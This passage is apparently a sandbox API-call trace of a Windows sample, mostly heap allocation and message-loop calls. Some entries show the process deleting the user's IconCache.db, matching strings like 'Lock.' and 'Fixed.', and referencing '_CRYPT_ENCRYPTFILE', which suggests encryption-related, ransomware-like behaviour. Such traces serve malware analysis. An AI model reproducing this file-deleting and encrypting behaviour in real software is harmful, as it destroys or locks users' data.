HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0242.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0242.999] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0242.999] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0242.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0242.999] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.000] CloseHandle (hObject=0x2d0) returned 1 [0243.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0243.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0243.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0243.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0243.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0243.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0243.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0243.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0243.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0243.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0243.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0243.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0243.004] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.004] CloseHandle (hObject=0x2a0) returned 1 [0243.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0243.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0243.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0243.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0243.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0243.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0243.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0243.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0243.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0243.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0243.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0243.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0243.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0243.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.011] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.011] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0243.011] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/IconCache.db", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db", lpFilePart=0x8cedf4*="IconCache.db") returned 0x2a [0243.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0243.011] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\iconcache.db")) returned 0x22 [0243.011] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4a3b706e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4a3b706e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd2e85042, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x13441, dwReserved0=0x1, dwReserved1=0x1c, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 0xa87250 [0243.011] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\iconcache.db")) returned 1 [0243.078] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4a3b706e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4a3b706e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd2e85042, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x13441, dwReserved0=0x1, dwReserved1=0x1c, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 0 [0243.078] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0243.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0243.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0243.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0243.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0243.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0243.079] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0243.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0243.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0243.079] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0243.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0243.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0243.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0243.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0243.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0243.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0243.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e58910 [0243.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0243.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0243.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0243.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0243.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0243.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0243.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0243.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0243.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0243.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0243.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0243.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x56) returned 0x2e54858 [0243.080] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/IconCache.db", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db", lpFilePart=0x8cf650*="IconCache.db") returned 0x2a [0243.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0243.080] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\iconcache.db")) returned 0xffffffff [0243.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0243.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0243.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0243.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0243.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0243.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0243.080] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.081] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.081] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0243.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0243.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0243.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0243.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0243.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0243.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Resmon.ResmonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0243.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esmon.ResmonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0243.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="smon.ResmonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0243.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mon.ResmonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0243.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="on.ResmonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0243.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n.ResmonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0243.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ResmonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0243.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ResmonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0243.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esmonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0243.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="smonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0243.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="monCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0243.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="onCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0243.082] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0243.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0243.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0243.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0243.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0243.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Resmon.ResmonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0243.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esmon.ResmonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0243.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="smon.ResmonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0243.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mon.ResmonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0243.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="on.ResmonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0243.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n.ResmonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0243.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ResmonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0243.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ResmonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0243.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esmonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0243.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="smonCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0243.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="monCfg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0243.084] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04118 [0243.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0243.084] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0243.084] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0243.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0243.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0243.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0243.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0243.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0243.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0243.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e58910 [0243.084] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0243.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0243.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0243.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0243.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0243.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0243.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0243.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x978490 [0243.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0243.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0243.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0243.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0243.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0243.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0243.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0243.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0243.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0243.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0243.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0243.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0243.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0243.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0243.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0243.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0243.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bf0 [0243.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0243.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0243.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0243.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0243.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0243.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0243.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0243.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0243.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0243.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0243.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0243.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0243.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0243.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0243.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0243.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0243.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0243.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0243.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0243.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0243.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0243.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0243.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0243.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0243.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0243.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0243.086] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0243.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0243.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0243.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0243.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0243.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0243.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0243.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0243.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0243.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0243.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0243.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0243.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0243.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0243.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0243.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0243.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0243.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0243.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0243.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0243.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0243.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0243.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0243.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0243.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0243.088] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 